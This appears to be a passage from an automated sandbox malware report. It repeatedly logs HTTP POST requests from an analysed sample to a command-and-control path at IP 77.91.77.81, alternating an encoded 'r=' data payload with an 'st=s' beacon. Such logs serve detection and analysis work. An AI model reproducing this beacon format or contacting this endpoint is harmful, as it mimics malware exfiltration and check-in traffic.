Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
